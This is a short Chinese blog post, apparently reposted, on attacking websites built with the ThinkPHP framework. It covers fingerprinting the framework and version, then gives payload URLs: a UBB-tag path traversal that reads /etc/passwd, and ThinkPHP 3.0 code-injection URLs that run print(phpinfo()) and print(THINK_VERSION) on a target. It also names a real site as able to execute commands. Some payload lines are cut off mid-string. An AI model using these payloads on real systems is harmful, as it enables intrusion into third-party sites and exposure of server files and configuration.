Thinkphp 漏洞小試


首先確定這個網站使用thinkphp的框架

國內很多php開源項目的代碼都是使用thinkphp框架編寫的,但是thinkphp框架有很多版本,如何才能知道我們使用的框架是哪個版本的呢?

在URL后面加thinkphp的目錄,也有可能爆出來

這是一個tankphp的網站目錄。供參考

  • admin是后台工程文件夾
  • home是前台工程
  • public里面用於存放CSS文件,JS文件以及網頁里面的圖片
  • ThinkPHP框架
  • ueditor是百度編輯器

     

 

ThinkPHPUbb標簽漏洞讀取任意內容 

 

localhost/index/?path=[code]/etc/passwd[/code]

附圖

 

hinkphp 3.0 爆路徑漏洞

 

1. thinkphp3.0 模塊加載失敗,出錯信息爆應用程序路徑。

檢測有兩種情況

1. 可執行命令,這個估計是偽3.0版本?

交大定票

此站到可以執行命令

http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D

可查看版本

http://webshell.cc/index.php/module/action/param1/$%7B@print(phpinfo())%7D

可查看phpinfo信息

2. 不可執行命令,爆路徑

http://webshell.cc/appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7

http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7

http://webshell.cc/index.php/module/action/module/param1/$%7B@print(THINK_VERSION)%7D


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM